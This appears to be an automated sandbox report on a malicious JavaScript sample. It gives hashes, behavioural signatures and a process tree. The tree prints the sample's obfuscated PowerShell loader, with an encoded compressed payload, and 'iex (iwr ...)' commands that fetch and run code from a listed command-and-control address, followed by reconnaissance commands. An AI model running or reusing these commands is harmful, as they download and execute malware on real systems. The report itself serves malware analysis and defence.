Analysis
-
max time kernel
142s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
04/01/2023, 07:35
Static task
static1
Behavioral task
behavioral1
Sample
55e020dbea48939cdd285ea106713f40bc077e2c.js
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
55e020dbea48939cdd285ea106713f40bc077e2c.js
Resource
win10v2004-20220901-en
General
-
Target
55e020dbea48939cdd285ea106713f40bc077e2c.js
-
Size
43KB
-
MD5
cd8ce0411e414f67fa7e34b06004314f
-
SHA1
55e020dbea48939cdd285ea106713f40bc077e2c
-
SHA256
0442f029601c5925d346260e512770beb5a9a28ef4ac9e2da5d1b0e7d27341a6
-
SHA512
322b0c0a1166f392150d46f529ab3475954b5255f955e893bffc49c61865a2f953dc3dd598ca13f9954b61fa79bea797ec7e740ab7cab48d6d5dda08d9631e03
-
SSDEEP
768:4aPlutIv0NmQCjO2rpReJk3zBE5kxuALjWV+yLFz9ohcqJ8H:uK1j1syDaVh9onKH
Malware Config
Extracted
http://159.203.143.66/r/
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 53 4004 powershell.exe 65 4004 powershell.exe 69 1204 powershell.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation wscript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 4440 tasklist.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 2356 systeminfo.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 800 powershell.exe 800 powershell.exe 4004 powershell.exe 4004 powershell.exe 1204 powershell.exe 1204 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 800 powershell.exe Token: SeDebugPrivilege 3668 whoami.exe Token: SeIncreaseQuotaPrivilege 800 powershell.exe Token: SeSecurityPrivilege 800 powershell.exe Token: SeTakeOwnershipPrivilege 800 powershell.exe Token: SeLoadDriverPrivilege 800 powershell.exe Token: SeSystemProfilePrivilege 800 powershell.exe Token: SeSystemtimePrivilege 800 powershell.exe Token: SeProfSingleProcessPrivilege 800 powershell.exe Token: SeIncBasePriorityPrivilege 800 powershell.exe Token: SeCreatePagefilePrivilege 800 powershell.exe Token: SeBackupPrivilege 800 powershell.exe Token: SeRestorePrivilege 800 powershell.exe Token: SeShutdownPrivilege 800 powershell.exe Token: SeDebugPrivilege 800 powershell.exe Token: SeSystemEnvironmentPrivilege 800 powershell.exe Token: SeRemoteShutdownPrivilege 800 powershell.exe Token: SeUndockPrivilege 800 powershell.exe Token: SeManageVolumePrivilege 800 powershell.exe Token: 33 800 powershell.exe Token: 34 800 powershell.exe Token: 35 800 powershell.exe Token: 36 800 powershell.exe Token: SeIncreaseQuotaPrivilege 800 powershell.exe Token: SeSecurityPrivilege 800 powershell.exe Token: SeTakeOwnershipPrivilege 800 powershell.exe Token: SeLoadDriverPrivilege 800 powershell.exe Token: SeSystemProfilePrivilege 800 powershell.exe Token: SeSystemtimePrivilege 800 powershell.exe Token: SeProfSingleProcessPrivilege 800 powershell.exe Token: SeIncBasePriorityPrivilege 800 powershell.exe Token: SeCreatePagefilePrivilege 800 powershell.exe Token: SeBackupPrivilege 800 powershell.exe Token: SeRestorePrivilege 800 powershell.exe Token: SeShutdownPrivilege 800 powershell.exe Token: SeDebugPrivilege 800 powershell.exe Token: SeSystemEnvironmentPrivilege 800 powershell.exe Token: SeRemoteShutdownPrivilege 800 powershell.exe Token: SeUndockPrivilege 800 powershell.exe Token: SeManageVolumePrivilege 800 powershell.exe Token: 33 800 powershell.exe Token: 34 800 powershell.exe Token: 35 800 powershell.exe Token: 36 800 powershell.exe Token: SeIncreaseQuotaPrivilege 800 powershell.exe Token: SeSecurityPrivilege 800 powershell.exe Token: SeTakeOwnershipPrivilege 800 powershell.exe Token: SeLoadDriverPrivilege 800 powershell.exe Token: SeSystemProfilePrivilege 800 powershell.exe Token: SeSystemtimePrivilege 800 powershell.exe Token: SeProfSingleProcessPrivilege 800 powershell.exe Token: SeIncBasePriorityPrivilege 800 powershell.exe Token: SeCreatePagefilePrivilege 800 powershell.exe Token: SeBackupPrivilege 800 powershell.exe Token: SeRestorePrivilege 800 powershell.exe Token: SeShutdownPrivilege 800 powershell.exe Token: SeDebugPrivilege 800 powershell.exe Token: SeSystemEnvironmentPrivilege 800 powershell.exe Token: SeRemoteShutdownPrivilege 800 powershell.exe Token: SeUndockPrivilege 800 powershell.exe Token: SeManageVolumePrivilege 800 powershell.exe Token: 33 800 powershell.exe Token: 34 800 powershell.exe Token: 35 800 powershell.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 2496 wrote to memory of 3804 2496 wscript.exe 86 PID 2496 wrote to memory of 3804 2496 wscript.exe 86 PID 3804 wrote to memory of 800 3804 cmD.exe 88 PID 3804 wrote to memory of 800 3804 cmD.exe 88 PID 800 wrote to memory of 3668 800 powershell.exe 89 PID 800 wrote to memory of 3668 800 powershell.exe 89 PID 1080 wrote to memory of 4004 1080 WScript.exe 92 PID 1080 wrote to memory of 4004 1080 WScript.exe 92 PID 4004 wrote to memory of 3068 4004 powershell.exe 94 PID 4004 wrote to memory of 3068 4004 powershell.exe 94 PID 4004 wrote to memory of 2356 4004 powershell.exe 95 PID 4004 wrote to memory of 2356 4004 powershell.exe 95 PID 4004 wrote to memory of 1712 4004 powershell.exe 98 PID 4004 wrote to memory of 1712 4004 powershell.exe 98 PID 4004 wrote to memory of 3136 4004 powershell.exe 99 PID 4004 wrote to memory of 3136 4004 powershell.exe 99 PID 4004 wrote to memory of 4440 4004 powershell.exe 100 PID 4004 wrote to memory of 4440 4004 powershell.exe 100 PID 4084 wrote to memory of 1204 4084 WScript.exe 105 PID 4084 wrote to memory of 1204 4084 WScript.exe 105
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\55e020dbea48939cdd285ea106713f40bc077e2c.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2496 -
C:\wiNDOWS\SYsTEM32\cmD.exe"C:\wiNDOWS\SYsTEM32\cmD.exe" /c PoweRSheLL -execUTiONPoLic BypasS "& ((gV '*mDr*').naME[3,11,2]-Join'') ( nEw-oBJecT syStEm.iO.CompREsSiON.defLAtEStReAM( [SYstEM.io.MEmOryStream] [CoNVErT]::FrOmbASe64sTRING('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') , [sYsTEm.io.ComPREsSiOn.coMPreSsioNmODe]::DEcOmPreSs) |fOrEACH-obJEcT{ nEw-oBJecT sySTEM.Io.sTReaMreadeR( $_, [teXt.EnCODInG]::AsCiI)} ).ReaDtoenD( ) "2⤵
- Suspicious use of WriteProcessMemory
PID:3804 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePoweRSheLL -execUTiONPoLic BypasS "& ((gV '*mDr*').naME[3,11,2]-Join'') ( nEw-oBJecT syStEm.iO.CompREsSiON.defLAtEStReAM( [SYstEM.io.MEmOryStream] [CoNVErT]::FrOmbASe64sTRING('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') , [sYsTEm.io.ComPREsSiOn.coMPreSsioNmODe]::DEcOmPreSs) |fOrEACH-obJEcT{ nEw-oBJecT sySTEM.Io.sTReaMreadeR( $_, [teXt.EnCODInG]::AsCiI)} ).ReaDtoenD( ) "3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:800 -
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3668
-
-
-
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\2082FD5682FBAA5C.vbs" "iex (iwr -useb http://159.203.143.66/r/emailbill/9E971E81734A276F)"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1080 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass iex (iwr -useb http://159.203.143.66/r/emailbill/9E971E81734A276F)2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4004 -
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe"3⤵PID:3068
-
-
C:\Windows\system32\systeminfo.exe"C:\Windows\system32\systeminfo.exe"3⤵
- Gathers system information
PID:2356
-
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /all3⤵PID:1712
-
-
C:\Windows\system32\nltest.exe"C:\Windows\system32\nltest.exe" /domain_trusts3⤵PID:3136
-
-
C:\Windows\system32\tasklist.exe"C:\Windows\system32\tasklist.exe"3⤵
- Enumerates processes with tasklist
PID:4440
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:2708
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\2082FD5682FBAA5C.vbs" "iex (iwr -useb http://159.203.143.66/r/emailbill/9E971E81734A276F)"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4084 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass iex (iwr -useb http://159.203.143.66/r/emailbill/9E971E81734A276F)2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:1204
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD500e7da020005370a518c26d5deb40691
SHA1389b34fdb01997f1de74a5a2be0ff656280c0432
SHA256a529468d442b807290b41565130e4c52760af9abec37613114db3857f11ad4fe
SHA5129a02bacc6fb922d6202548e80e345c6cdec346b79ef7ac7a56f89fd342ff128de004065b9d010d015b54d4ca72f665ca658c7ffcd8eb906e14bfa5b48b43f2cf
-
Filesize
106B
MD529814eb775761c5088028d1907f48c55
SHA1cb369ec71c0a44b9b9411edf956efbb5654ab26e
SHA256ceb3b2cce642a3dcda3a370c282fd0ae6daf7521a44350d302b4a1351e4ac3db
SHA512a7ebcab691e6bbe52f150de7e1515f341bab3756c0941fc221d1aa40c54983b73158ff4037b11c18e1fddc2e634ea0fd5ab898cf716b02163c10d98159a7b3c1
-
Filesize
1KB
MD5de43a0590ecfcd4ca330b048009d801e
SHA13ac38c42d5e4ed587dabf5e1a66db763e73f4596
SHA25677d2b32f6cea948cb5c383b7d8816e959fe8f5a17858eaa837647675624300b6
SHA512f1725dd442a13722c8a50b5b4abdabadaa14cafa0b663e4a5912060b45383031ce400a81bff5e3ad7b8df746afd407b23b6caa5fabd6ae1cd496c0551bd109ea
-
Filesize
1KB
MD58793501facbb5fb5e7d28c9d237329f6
SHA1a8cb95480f087e6fd16345a35bd29687ad705bc4
SHA256b89b73dac95a5cdbf833bb7c187d5865f815e31f37531cf03c1bf7cdfb6caac9
SHA512eabb46d839cb8f6ee465e98f8cc8e0a51ed16f8bb660add7e4f7c34db266d822e6d669a331ca1cf24e8f99723b44f8e78837e036c41ce4a7150b27462972a4b1